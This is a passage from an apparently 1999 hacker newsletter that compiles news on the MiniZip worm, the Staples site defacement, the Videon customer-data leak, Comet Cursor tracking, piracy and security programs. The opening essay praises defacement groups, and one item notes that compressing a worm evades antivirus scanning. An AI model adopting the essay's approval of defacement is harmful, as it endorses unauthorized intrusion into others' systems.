      are ignored and pigeonholed, everyone who totes a
      computer and investigates security will be labeled a
      threat.

      What does make it worth it? Arguably, the few who carry
      on the tradition. PHC and Narcissus - using their
      defacements as a political tool. DHC - putting an
      interesting poetic twist to their cracks. ULG - for making
      BIG statements on BIG sites. Last but not least, v00d00 -
      for his cynical views and unique style. There are others,
      no doubt, but these guys definately take the cake for
      originality and style - they have my respect.

      So next time you see my name or anyone else's pop up on
      attrition and wonder why we do it, think back to this
      article. Is it worth it?

      You decide.



      YTCracker(phed@felons.org)
      (c)1999 YTCracker andseven one nine



     @HWA
     
04.0  ExplorerZip Shrinks, Becomes MiniZip 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Evil Wench 
      By applying a simple compression scheme (Neolite) to
      the well known destructive virus WormExplorer it is
      possible to sneak the old worm by antivirus software.
      This 'new' version of WormExplorer is being called
      MiniZip. The worm uses MAPI-capable e-mail programs
      to propagate, such as Microsoft Corp.'s Outlook,
      Microsoft Corp.'s Outlook Express and Microsoft Corp.'s
      Exchange. At least twenty companies and several
      thousand systems have been infected so far. (It is
      pretty sad that with todays technology a simple
      compression routine is enough to bypass antivirus
      technology. Pattern detection is not the answer. Sure
      hope the AV companies have something better up their
      sleeves.) 

      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop
      
      MSNBC
      http://www.msnbc.com/news/341096.asp
      
      Associated Press - via Baltimore Sun
      http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405
      
      MiniZip a nasty, small clone of ExploreZip

      New virus compresses ExploreZip code to
      evade anti-virus software, bites at least a
      dozen companies.

      By Jim Kerstetter, PC Week
      UPDATED December 1, 1999 9:04 AM PT 

      They call it, MiniZip.

      Virus researchers at Network Associates Inc. (Nasdaq:
      NETA), Symantec Corp. (Nasdaq: SYMC) and Trend
      Micro Inc. warned Tuesday evening that a new version of
      the ExploreZip virus, which wipes out information on a
      hard drive, has hit at least 12 companies so far, six of
      them high-tech manufacturing companies. Several
      thousand PCs are believed to have been hit. 

      The ExploreZip variant, also called ExploreZip.worm.pak,
      is 120KB, about half the size of its predecessor. But 
      other than its diminutive size, MiniZip acts exactly like
      ExploreZip, which wipes out files on hard drives and
      can spread via e-mail. 
      
      Compression conundrum
      MiniZip is so small because the virus's author
      compressed the original ExploreZip code. Compressing it
      changes the bits, meaning that anti-virus software has
      trouble identifying the new virus. MiniZip first appeared
      last week, so most anti-virus makers have updated their
      software to detect its code. While anti-virus makers
      issued notice of the new updates, it appears that many
      companies have not updated their anti-virus software,
      allowing Tuesday's outbreak. 
      
      What to look for
      ExploreZip, the "father" of MiniZip, was first reported on
      June 11. To propagate, the worm uses MAPI-capable
      e-mail programs, such as Microsoft Corp.'s Outlook,
      Outlook Express and Exchange. 
      
      It e-mails itself out as an attachment with the filename
      "zipped_files.exe." The body of the e-mail message looks like
      it came from a regular e-mail correspondent and says:
      
      "I received your email and I shall send you a reply ASAP.
      Till then, take a look at the attached zipped docs."
      
      Once it's launched, MiniZip launches the original
      Worm.ExploreZip routine. It looks for any drives mapped
      to the infected computer and spreads to them. It also
      looks for unread e-mail and automatically replies to them,
      in search of new victims. 
      
      "That's why it has spread so rapidly now, but didn't at first,"
      said Vincent Weafer, director of the Symantec Antivirus
      Research Center. "This is exactly how ExploreZip
      spread."
      
      MiniZip may display an error message informing the user
      that the file is not a valid archive, according to the
      anti-virus companies. The worm copies itself to the
      c:\windows\system directory with the file name
      "Explore.exe" and then modifies the WIN.INI file so that
      the virus launches each time Windows is started.
      
      Associated Press;
      
      Computer virus devouring files


      The Associated Press

      SAN FRANCISCO (AP)  Experts scrambled to warn thousands
      of computer users that a familiar and damaging virus has struck
      scores of companies and could be slumbering in their e-mail inboxes.

      The Mini-Zip virus tore through computers on Tuesday, devouring
      files and crippling e-mail systems, anti-virus analysts said. It was
      expected to renew its assault today as unsuspecting users logged on. 

      Dan Schrader, vice president of new technology at Trend Micro in
      Cupertino, Calif., said he fielded complaints of significant problems
      from four Fortune 500 companies and scores of smaller companies. 

      Sal Viveros, a marketing manager for Santa Clara-based Network
      Associates, which makes anti-virus software, said 20 large
      corporations had been affected by Tuesday evening. 

      The experts refused to release the names of affected companies. 

      Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It
      was considered the most destructive virus since the Melissa outbreak
      in the spring. 

      ``The last time this virus came along it affected tens of thousands 
      maybe hundreds of thousands of computers  and caused millions
      of dollars in damage,'' Schrader said. ``It's malicious and
      fast-spreading. We consider this to be high-risk.'' 

      It wasn't clear whether the problem had been reported to the
      government-chartered CERT Coordination Center  formerly the
      Computer Emergency Response Team  at Carnegie Mellon
      University in Pittsburgh. There were no warnings on its Web site
      early today. 

      Anti-virus experts said the bug gets loose from an infected system as
      a seemingly friendly reply to a clean e-mail sent via the Microsoft
      Outlook, Outlook Express or Exchange browsers. 

      The virus intercepts the original message and automatically sends
      itself as a response  even changing the subject line from, for
      example, ``Work Meeting'' to ``Re: Work Meeting.'' 

      The body of the message reads: ``Hi (recipient's name)! I received
      your e-mail and I shall send you an e-mail ASAP. Till then, take a
      look at the attached zipped docs. bye.'' 

      The e-mail contains an attachment called ``zippedfiles.exe.'' If a
      user double-clicks on the attachment, the virus is set loose in the new
      victim's system. 

      It then destroys a series of files in a computer's hard drive by
      replacing them with empty files. 

      Anti-virus experts cautioned users against opening e-mails if they do
      not know the sender or why they were sent. They said the virus
      could be fought with updated anti-virus software. 

      Originally published on 12/01/1999 
      
      @HWA      
      
05.0  Staples Files Suit Against Unknown Defacer 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Staples Inc. has filed a lawsuit in US District Court in
      Boston charging that "John Doe," an unidentified cyber
      intruder, illegally accessed the company's Web site and
      damaged the company by stealing e-commerce
      business. The defacement that occurred on October
      9th, featured advertisements for products at Home
      Depot. Staples hope to identify the intruder shortly.
      (How do you sue an unknown person?) 

      Boston Globe
      http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml
      
      Associated Press       
      http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc
      
      Staples files suit against Web
      hacker 
 
      By Shelley Murphy, Globe Staff, 11/30/99 
 
          hopping on line may be the best way to avoid holiday crowds, but
          customers visiting Staples's Web site one day last month encountered a
      unique problem when they unwittingly found themselves in a competitor's
      store.
 
      A hacker broke into the Framingham office-supply retailer's Internet site,
      www.staples.com, on Oct. 9 and posted advertisements for one of the
      company's major competitors, Office Depot.
 
      Shoppers clicking on Office Depot products were linked immediately to the
      home page of Staples's major competitor, which is based in Delray Beach,
      Fla.
 
      Officials at Staples Inc. filed a lawsuit in US District Court in Boston
      yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed
      the company's Web site and damaged the company by stealing e-commerce
      business.
 
      The suit contends that the hacker is believed to live in or near Massachusetts
      and that the company expects to identify him shortly.
 
      ''We consider it highly unlikely that...our competitors were involved in any
      way,'' said Shannon Lapierre, public relations manager of Staples, speculating
      that the changes to the Web site may have been a prank.
 
      But Staples, which just announced third-quarter Internet sales revenue of $24
      million, is taking the Web-site intrusion seriously and is determined to identify
      the culprit and report him to federal authorities, Lapierre said.
 
      Meanwhile, federal authorities have been on the lookout for Internet fraud.
      Federal law prohibits unauthorized access to a computer and calls for as
      much as 10 years in prison if damage is caused recklessly as a result of the
      breach.
 
      ''Obviously e-commerce is a very important part of our business and very
      important to the company,'' said Lapierre. 
 
      Staples's goal is to have 1 million on-line customers and $1 billion in Internet
      sales by 2003, Lapierre said.
 
      Staples, which did $7 billion in sales last year and which operates more than
      1,000 office superstores, launched its Web site a year ago. 
 
      While monitoring the site Oct. 9, officials noticed that products advertised
      throughout the Web site had been deleted and replaced with products bearing
      the Office Depot logo.
 
      The suit said that the Office Depot advertisements contained links to the
      Florida company's Web site, meaning that Staples's shoppers who clicked on
      the illegally advertised products were redirected to the competitor's Web site.
 
      Shoppers were diverted from Staples to Office Depot for about an hour
      before the problem was corrected, Lapierre said.
 
      In addition to lost business, Staples alleges that it cost the company time and
      money to repair its Web site and to determine the extent of the security
      breach. 
 
      Calls to Office Depot, the world's largest seller of office products, were
      referred to the company's vice president of public relations, who couldn't be
      reached for comment late yesterday.
 
      Lapierre said the problems created by the hacker had never happened to
      Staples before. ''It's an interesting time we live in,'' she said.
 
      Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq
      market. Office Depot closed at 11 1/2, down , on the New York Stock
      Exchange.
 
      This story ran on page D01 of the Boston Globe on 11/30/99. 
      Copyright 1999 Globe Newspaper Company. 
     
     
      Associated Press;
     
     
      Story Filed: Tuesday, November 30, 1999 12:50 PM EDT 
      
      BOSTON (AP) -- Office supply store Staples has filed suit against an
      unnamed hacker who broke into its Internet site and posted 
      advertisements that led Web browsers to the home page of one of its
      chief competitors. 
      
      In the suit filed Monday in U.S. District Court in Boston, 
      Framingham-based Staples charged that the hacker, referred to as
      ``John Doe,'' illegally entered the site and damaged Staples by 
      stealing e-commerce business. 
      
      The suit claims that ``John Doe'' lives in or near Massachusetts, and
      that the company expects to identify him shortly. 
      
      The hacker broke into the Staples Internet site on Oct. 9 and posted
      advertisements for Office Depot. Shoppers who clicked on the Office 
      Depot products were linked to the Office Depot home page. The problem
      was corrected after about an hour. 
      
      In the suit, Staples alleges that, aside from a loss of money, it cost
      time and money to find and fix the security breach. 
      
      Staples officials speculated that changes to the Web page were a prank,
      and discounted the possibility that its competitors were behind it. 
      
      Gary Schweikhart, an Office Depot spokesman, said Tuesday the company 
      was outraged by the computer hack and said Office Depot had no part in
      it. 
      
      ``We're not that dumb and at the same time we would not condone any
      activity that is illegal and unethical,'' he said. 
      
      Federal law calls for a maximum of 10 years in prison if damage is 
      caused as a result of unauthorized access to a computer. 
      
      Staples, which did $7 billion in sales last year, launched its Web site
      a year ago. The company hopes to have 1 million Internet customers and 
      $1 billion in Internet sales by 2003, Lapierre said. 
      
      Copyright  1999 Associated Press Information Services, all rights reserved.
      
      @HWA
      
06.0  Comet bows to consumer pressure
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Ted 
      
      Yesterday Comet Systems Inc. was accused of
      collecting data on consumers web surfing practices with
      their free cursor changing software. The software
      Comet Cursor, is installed on over 16 million systems and
      tracks web usage of over 60,000 web sites. Following
      rampant consumer outcry over the practice Comet
      Systems has agreed to allow consumers to delete the
      serial number used to track individual web surfing habits
      and will also seek certification from Truste, the industry
      privacy watchdog group. Truste's certification of Comet
      Systems could take 45 to 60 days. 

      Associated Press - via San Jose Mecury News       
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm
      
      Software firm in privacy flap

      BY TED BRIDIS
      Associated Press Writer 

      WASHINGTON (AP) -- A company that offers free software to change an 
      Internet browser's computer cursor into cartoon characters promised 
      Tuesday to let people delete a serial number the company was using to 
      track customers across the Internet.

      Responding to an outcry over the privacy implications of its software, 
      Comet Systems Inc. also said it will seek certification from Truste, an 
      organization that monitors whether Web sites are following the privacy 
      promises they make to consumers.

      Truste said Comet Systems had ``significantly damaged the trust of their 
      customers.''

      New York-based Comet Systems acknowledged Monday that its cursor software 
      -- used by more than 16 million people -- reports back to its own 
      computers with each customer's unique serial number each time that person 
      visits any of 60,000 Web sites that support its technology.

      Those sites include dozens aimed at young children, such as those for the 
      Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty 
      Inc. site for Beanie Babies.

      Comet said it never violated customers' privacy because it does not 
      attempt to match its serial numbers against anyone's real-world identity. 
      But it said Tuesday it will allow customers to delete those numbers, 
      anyway, although the numbers helped Comet keep an accurate census of its 
      customers for marketing and billing purposes. Some Web sites pay Comet 
      based on the number of visitors using the cursor-changing technology.

      Customers will be able to download a program starting Wednesday from 
      Comet's Web site, at www.cometsystems.com, to replace their serial number 
      with a meaningless number that isn't unique.

      ``If that's what we need to do to appease users, we'll do that,'' 
      spokesman Ben Austin said.

      Comet's certification to Truste could take 45 to 60 days. But that 
      organization only monitors data collected at a company's Web site, not by 
      its stand-alone software programs.

      ``We don't cover software privacy practices,'' Truste spokesman David 
      Steer acknowledged Tuesday. ``Comet Systems has realized they have 
      significantly damaged the trust of their customers, and they're looking at 
      ways to rebuild that trust.''

      Critics said earlier that the company should have more openly disclosed 
      the behind-the-scenes transmissions, which are made without warning. They 
      also said it would not be difficult given today's technology to begin 
      correlating the Comet serial number with a consumer's identity if the 
      company suddenly decided to or if Comet -- with its extensive tracking 
      database -- were purchased by new owners willing to do that.

      ``The typical guy who goes to Best Buy and buys a computer and installs 
      this software, he'll never know about this stuff,'' said programmer Dave 
      Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to 
      follow you around on the Internet.''

      Steer, the spokesman for Truste, said other companies also undoubtedly are 
      clandestinely monitoring the online behavior of their customers.

      ``I believe there are a lot of other software companies that are 
      collecting personal information and not disclosing it,'' he said. ``That 
      is just no longer acceptable.''

      Internet discussion groups were filled Tuesday with messages from angry 
      people who believed the cursor software did or could violate their 
      privacy.

      In a statement published on the company's Web site, Comet President Jamie 
      Rosen said the company was ``quite surprised'' at the privacy questions 
      because the software doesn't ask for a customer's name, e-mail address or 
      other personal information.

      ``We deeply regret that this has caused concern among our users and we 
      pledge to be a leader in the area of online privacy in the future,'' he 
      said.
      
      @HWA
      
07.0  Personal Info of Canadian ISP Users Leaked 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Astroboyz and dj.tazz 
      The personal information on almost 2,700 Internet users
      in Manitoba Canada was stolen and spread across the
      Internet. Users of the Videon Wave's Internet cable
      services had thier account numbers, along with
      customer names, addresses, phone numbers, user
      names and passwords stolen. The intrusion into Videon
      systems took place almost two weeks ago however the
      company never notified any of the effected customers.
      The incident has not been reported to the local Police or
      the RCMP. 

      Winnipeg Free Press
      Does anyone have a better link? This one is about to
      expire. 
      
      http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search
      
                                                                            
      Hackers tear cover off Videon security

           
      Tue, Nov 30, 1999
     
      By Doug Nairne
     
      Legislature Reporter
     
      PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been 
      obtained by Internet hackers in what is being called one of the most 
      damaging computer attacks ever against a Manitoba company.

      The information has become a hot property as it is passed around the 
      city's computer underground, while irate customers are demanding to know 
      why Videon didn't notify them that their names, phone numbers and 
      passwords had been taken.

      The list includes 2,688 Videon account numbers, along with customer names, 
      addresses, phone numbers, user names and passwords. 

      Reid Eby, an Internet security consultant and president of Interlink 
      Online Services, said hackers could use the information to access people's 
      Internet accounts and send and receive e-mail as if they were the owner. 
      E-mail that has already been downloaded to a computer is       safe, but 
      all incoming messages can be intercepted. There is no impact on Videon 
      cable TV subscribers, only cable modem users.

      "If they got the user names and passwords, this is the worst incident I've 
      ever heard about locally," Eby said. "Given what is going on with hacking, 
      placing any client information on-line in this day and age is silly." 

      Eby said the Videon information would also be valuable for sale to direct 
      marketers and junk mailers, who would covet the contact data for high-end 
      computer users.

      Anyone who does any business transactions on-line may also be in danger, 
      especially if their credit card numbers are transmitted back to them in a 
      receipt. Hackers could also use the information to "socially engineer" a 
      target, tricking people into revealing more information       about 
      themselves or making their computers vulnerable to intrusion.

      Videon spokeswoman Nadine Delisle said that a routine security sweep last 
      week showed that customer information had been pilfered. She claimed that 
      no passwords were obtained, although lists being circulated clearly 
      include passwords, user names and other information.

      Despite the criminal nature of the intrusion, city police and RCMP said 
      the incident has not been reported to their investigators. 

      Sources say the hack took place during the second week of November, but 
      none of the Videon customers contacted by the Free Press yesterday knew 
      that anything had happened.

      "I'm a little surprised that we were never notified about this," said 
      businessman Sam Katz, whose wife's personal cellular phone number is on 
      the list, along with his other information. "I'd like to think these 
      things are a little bit better secured." 

      Delisle said Videon decided the information wasn't sensitive, so customers 
      were not informed about the security breach. 

      "The risk seemed to be very minimal," she said. "It was not assessed to be 
      important."

      Katz disagreed, saying he plans to find out why he wasn't notified.

      Winnipeg police Const. Bob Johnson said companies often don't report 
      hacking because they are concerned about bad publicity.

      Delisle said the incident was not "serious enough" to report to police.

      "We closed the security hole so that this will not happen again, that was 
      the priority," she said.

      But a spokeswoman with the Canadian Radio-television and 
      Telecommunications Commission said Videon customers can file a complaint 
      against Videon and demand an explanation. 

      "People should be able to get the reasons why their private information 
      was leaked out," she said.

      The customer list contains a wide cross-section of Winnipeggers, including 
      doctors, business people, university professors, journalists and even 
      computer security experts. The hackers say they could pose as any one of 
      the people on the list, although there is no evidence that       anyone 
      has done so yet.

      Hackers contacted said they were particularly pleased to get the personal 
      information of one Videon customer -- a computer security expert who has 
      written articles on the psychology of hackers, describing them as geeks 
      and loners.

      Meanwhile, Ron Campbell, another cable modem customer whose details have 
      been disclosed, said he is upset about the incident but that he doesn't 
      blame Videon for the security breach.

      "I don't particularly think Videon could have stopped this from 
      happening," he said. "I assume they had some security in place."

      PHOTO ILLUSTRATION BY JOE BRYKSA/WINNIPEG FREE PRESS

      Hackers managed to breach Videon's security and gain access to customers' 
      personal files.
      
      @HWA
      
08.0  First Internet Piracy Case in Japan 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Galleon 
      A 21-year-old student has been accused of illegally
      distributing over 170 titles of game software for
      different Nintendo machines. This is the first case of an
      unauthorized delivery of game software via the Internet
      in Japan. 

      Asia Biz Tech       
      http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776
      
      Hokkaido
      Police Pursue Unauthorized Net Delivery of Game Software 

      December 1,
      1999 (TOKYO) -- The Hokkaido Prefectural Police's Sapporo Kita Station
      alleged that a college student delivered unauthorized game software
      over the Internet.

      It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's
      Office for prosecution.

      The 21-year-old student, who has been accused of illegally distributing
      about 180 titles of game software for Family Computer (Famicon) and
      Game Boy game machines made by Nintendo Co., Ltd., is  suspected of
      infringing on rights under the Copyright Law.

      The case is the first disclosure of an unauthorized delivery of game
      software via the Internet in Japan.

      The college student reportedly distributed the software on his own 
      Web page,labeled as "information exchange," to  seem as if the
      delivery did not constitute downloading of game software.

      Game software for sale is usually recorded in read-only memory (ROM).
      The student ran software which emulates a game  machine on a  personal
      computer, and stored the game software recorded in these ROMs on
      a hard disk drive on the PC and uploaded it onto a Web server.

      According to Association for Copyright for Computer Software (ACCS), 
      which assisted the police in the disclosure of the  case, there
      seemed to be a lot of downloading from the  suspect's Web  site, but
      it does not know how many downloads were actually made. 

      An ACCS spokesman said that software distribution without authorization
      of an author itself is unlawful. In addition, the suspect knew
      the case was illegal, intentionally  concealed the  illegal uploading
      and downloading and distributed not just a few software programs over
      the Internet, the spokesman said.

      ACCS assumes there must be many other cases of illegal uploading and
      downloading of game software via the Internet.  The association
      therefore hopes that the disclosure of the  case will serve as a warning
      to the public.

      [Comment by BizTech]
      
      The disclosure of the illegal uploading and downloading of game software
      was based on a "breach of the Copyright Law." However, there  are various
      applications of the Copyright Law depending on the case. In this case, the
      college student was suspected of "infringing on the right of public
      transmission under the Copyright Law."

      "The right of public transmission (Article 23 of the Copyright Law) is an
      author's proprietary right to transmit his or her work to the general public
      via broadcasting and/or communications. For example, an author's authorization
      will be needed for any broadcasting of a work in a television or radio program.
      (Note. In Japan, granting of copyrights and collection of license fees for
      the majority of musical works are performed by the Japanese  Society for
      Rights of Authors, Composers and Publishers (JASRAC).) Distribution of
      works over the Internet is included in the public transmission right.
      Distribution of any software and musical data over the Internet shall constitute
      infringement on the public transmission right and thus breaches the Copyright Law.
      (Note. Any case which constitutes "reference" under the Copyright Law
      shall be excluded from this case.)

      For example, if someone transforms Celine Dion's hit number, "My heart will go
      on," into MIDI data without obtaining Dion's permission and  plays the song
      on his or her own Web site as background music, strictly speaking such
      an act would constitute infringement or the public transmission right.

      (Note: Any works whose copyright is obviously expired shall be  excluded from
      this case. For  example, any distribution of MIDI data of   well-known  works 
      such as a composition  made by Mozart,  Beethoven or  Chopin, is generally 
      legal.)
      
      In this case, the college student uploaded game software on a Web server
      without  obtaining authorization of the authors of the game software, and
      enabled  anybody who can access the Web site to download the software
      programs. This is called "enabling of public transmission." The case infringes
      on the public transmission  right.

      In addition to infringing on the public transmission right, the suspected
      student also breached the Copyright Law for uploading of the game software on
      the Web server because the student made unauthorized copies of software
      (Infringement on the reproduction right, Article 21 of the Copyright Law).

      In the case, the suspect made unauthorized copies when copying the game software
      from ROMs to the hard disk drive of his or her PC and when copying it from
      the hard disk drive to a hard drive on the Web server. Because of the suspect's
      ultimate objective was to distribute of software over the Internet, the
      case does not constitute a "reproduction for private use" under Article 30
      of the Copyright Law, and thus breaches the Copyright Law. The suspect repeatedly
      breached more than one provision of the Copyright Law, even though the other
      breaches were not disclosed.

      (Kazumi Tanaka, Deputy Editor, BizTech News Dept.)
      
      @HWA


09.0  FBI Launches InfraGuard in Ohio 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A national program known as InfraGuard, developed by
      the FBI to promote information sharing among law
      enforcement, industry, the academic community and the
      public about computer network intrusions and computer
      system vulnerabilities, was officially launched in Ohio
      yesterday. Over 200 people where expected at the
      kickoff meeting. (Watch for an exclusive insiders report
      on InfraGuard coming soon to HNN.) 

      The Cincinnati Post 
      http://www.cincypost.com/news/hacker112999.html
      
      C I N C I N N A T I   P O S T

 
      FBI leads new effort to help
      thwart hackers
 
      Post staff report
 
      Nearly 200 people were expected at today's kickoff
      meeting of a group organized by the FBI to thwart
      hackers from breaking into government, industry and
      academic computer systems in Cincinnati and southern
      Ohio.
 
      Speakers included Cincinnati FBI agent in charge
      Sheri Farrar, Southern Ohio U.S. Attorney Sharon
      Zealey, Ohio Bureau of Criminal Identification and
      Investigation Superintendent Ted Almay and
      representatives from the FBI's National Infrastructure
      Protection Center.
 
      The regional meeting, held at Deer Creek State Park
      in Pickaway County, is part of a national program
      developed by the FBI and industry to promote
      information sharing among law enforcement, industry,
      the academic community and the public about
      computer network hacking and computer system
      vulnerabilities.
 
      So-called ''InfraGard'' chapters are designed to help
      protect the nation's information systems from cyber
      and physical threats. The Cincinnati FBI's chapter
      includes the 48 southern-most Ohio counties, including
      Cincinnati, Dayton and Columbus.
 
      A national InfraGard program was developed after
      President Clinton directed the FBI to identify and
      coordinate computer infrastructure protection experts
      inside and outside the federal government.
 
      Members of the Cincinnati chapter include the Ohio
      Supercomputer Center, American Electric Power,
      Ohio State University and Bank One.
 
      Members eventually will have access to an Alert
      Network that will allow them to use encryption
      technology to report attacks on their computer
      systems to the FBI. The FBI will provide what it calls
      a ''sanitized'' description of the incident, without
      identifying the source of the report, to other chapter
      members so they can take actions to protect their own
      systems.
 
      Members also will have access to an InfraGard Web
      site being created by the FBI that will provide timely
      information about computer protection issues.
 
      Target: Hackers
 
      InfraGard is seeking more regional chapter members
      from telecommunications, banking, energy and
      transportation industries, as well as from academic
      institutions, hospitals and government agencies.
 
      For more information, call Cincinnati FBI agent
      Roger Wilson at (513) 421-4310.
 
      Publication date: 11-29-99
      
      @HWA
      
10.0  National Gun Database Goes Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A national gun database, Online Lead, was activated
      Tuesday at all 331 branches of the Treasury
      Department's Bureau of Alcohol, Tobacco and Firearms.
      The system is available to police and other local law
      enforcement officials through ATF offices. The database
      included the gun's make and serial number, and the
      complete chain of sale from manufacturer to wholesaler
      or distributor to the first retail sale by a federally
      licensed gun dealer. Officials have said that security
      measures to protect the database from malicious
      intruders has been taken but did not elaborate. 

      Associated Press      
      http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc
      
      Story Filed: Tuesday, November 30, 1999 11:44 AM EDT 

      WASHINGTON (AP) -- Federal and local law enforcement officials are getting 
      a new high-tech tool to fight crime: a nationwide computer system that 
      aims to trace guns used during crimes. 

      The system, called Online Lead, is administered by the Treasury 
      Department's Bureau of Alcohol, Tobacco and Firearms and has been 
      operating on a limited trial basis since February. 

      ``Online Lead takes our fight against gun traffickers into cyberspace,'' 
      said Treasury Secretary Lawrence Summers, who made the announcement today. 
      ``It gives federal, state and local law enforcement officials throughout 
      the country a new tool to help identify       and arrest gun 
      traffickers.'' 

      Starting today the computer system is operating full time and is widely 
      available. Specifically, the system is in use at all 331 ATF field 
      offices. Although police and other local law enforcement officials can't 
      tap directly into the system on their own, they can access       the 
      system through ATF. 

      Local law enforcement officials are encouraged but not required to ask ATF 
      to trace guns used during crimes. The results of those traces are entered 
      into a growing national database, which now has information on more than 1 
      million traced firearms. 

      ATF has been tracing guns used in crimes for years, but the sophisticated 
      software used in the new online system should make it much easier for 
      investigators to analyze trends and patterns in illegal firearms 
      trafficking, law enforcement officials said. For police       and other 
      local law enforcers, the system may provide new leads and additional 
      information about crimes, they said. 

      Online Lead is updated frequently and provides information on a traced gun 
      one day after it is completed. 

      The new system evolved from earlier projects that aim to provide 
      investigators access to data on guns used in crimes. Those systems stored 
      information on traced guns on computer discs that had to be shipped to ATF 
      field offices, a slow process. The new       online system gives law 
      enforcers fast access to such information. 

      Information about all firearms traced by the ATF goes into the national 
      database and is available on the new online system. What agents can trace 
      is limited. They start with a gun's make and serial number, moving forward 
      from the manufacturer to a wholesaler       and distributor to the first 
      retail sale by a federally licensed gun dealer. 

      All sales by licensed dealers must be recorded, and those records must be 
      made available to ATF. But any sales by individuals or by collectors at 
      gun shows, for example, are considered private and exempt from such 
      record-keeping requirements. 

      Copyright  1999 Associated Press Information Services, all rights reserved.
      
      
      @HWA
      
11.0  Zero Knowledge Ships Freedom, Finally 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Jordan 
      After what seemed like an agonizingly long beta period
      Zero Knowledge Systems has finally shipped Freedom
      1.0. Freedom works seamlessly alongside your favorite
      browser and other Internet applications. You can surf
      the web, send email, chat, telnet, and participate in
      newsgroups as you normally would, only now with
      complete confidence that your personal information is
      not being collected without your consent. Freedom
      identifies you on the net with a 'nym' that you choose.
      There can be only one 'nym' so unless you want
      something like 'Tom4538720' you should reserve yours
      today. 

      Freedom 1.0       
      http://www.zks.net/clickthrough/click.asp?partner_id=542
      
      @HWA
      
12.0  OpenBSD 2.6 Ships 
      ~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Theo 
      What is probably the most secure operating system
      available has shipped its new version. OpenBSD 2.6 is a
      FREE, multi-platform 4.4BSD-based UNIX-like operating
      system. It emphasizes portability, standardization,
      correctness, proactive security and integrated
      cryptography. Some of the new features include the
      addition of ssh (OpenSSH) and Perl 5.005_03 to the
      base system, reliability patches for the PowerPC port,
      improved support for ext2fs, USB support, a faster
      install process and a lot more. 

      OpenBSD       
      http://www.openbsd.org/
      
      @HWA
      
13.0  Videon Was Warned of Data Loss 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by dj.tazz and P_Simm 
      The Canadian ISP, Videon, was warned that it had left
      its customer database available on the web for all to
      see. Days later, after the database had made the
      rounds on the net the security issue was resolved.
      Customers however where never notified by the
      company. They did not find out about the problem until
      weeks later when it appeared in the local newspaper.
      Videon has confirmed that they received the emailed
      warning and failed to act in a timely manner to prevent
      the loss of customer account numbers, names,
      addresses, phone numbers, user names and passwords. 

      Winnipeg Free Press       
      http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search
      
      Videon ignored Web security breach
     
      E-mail warning of leak never received reply
     
     
      Wed, Dec 1, 1999
     
      By Doug Nairne
     
      Legislature Reporter
     
      VIDEON WAS warned that its cable modem customer list was left unprotected 
      on the Internet but failed to act for at least a day, allowing hackers a 
      chance to pilfer the sensitive information, the Free Press has learned.

      An e-mail message identifying the security leak was sent to Videon 
      security staff on Nov. 10, which is thought to be the day prior to when 
      personal details on about 2,700 people were downloaded.

      A man who asked to be identified only by his computer user name, "Grub," 
      said he sent the warning after stumbling on the customer data base while 
      surfing the Videon Web site. 

      Despite Videon's insistence that the information was taken after a 
      "deliberate attack," Grub said he found it sitting out in the open where 
      anyone could have seen it. 

      "When I found this I thought, 'Holy smokes, I can't believe this is up 
      there,' " he said. "They might as well have written out the list and taped 
      it to the front door." 

      Grub said he e-mailed Videon warning them of the problem but never 
      received a reply.

      "They make it sound like a big computer attack, but it was probably just 
      their own stupidity," he said.

      Sometime later, the list was discovered by someone else and copies began 
      to be made. According to Videon, customer names, addresses and phone 
      numbers have been posted to an Internet chat group, where it would be 
      widely accessible.

      Videon spokeswoman Nadine Delisle confirmed that Videon received the 
      warning e-mail. She said that a combination of bad judgment by staff and 
      the Remembrance Day holiday resulted in the message initially being 
      ignored.

      "At the time it was not perceived to be a big risk," she said. "In 
      retrospect, that may have been an error in judgment."

      Hackers ended up getting what they describe as a gold-mine of information, 
      including account numbers, names, addresses, phone numbers, user names and 
      passwords. They say the information can be used to intercept people's 
      e-mail or to assume someone else's identity       on the Internet.

      After playing down the security leak Monday, Videon was scrambling to deal 
      with the crisis yesterday. Senior executives and communications staff were 
      in emergency meetings most of the day. 

      Delisle said Videon was planning a massive e-mail broadcast to all its 
      cable modem customers to inform them of the incident, and will provide 
      instructions on how to take precautions like changing passwords.

      She said Videon also wants to reassure people that their billing 
      information and credit card numbers were not revealed.

      An internal investigation is being carried out, and an outside firm will 
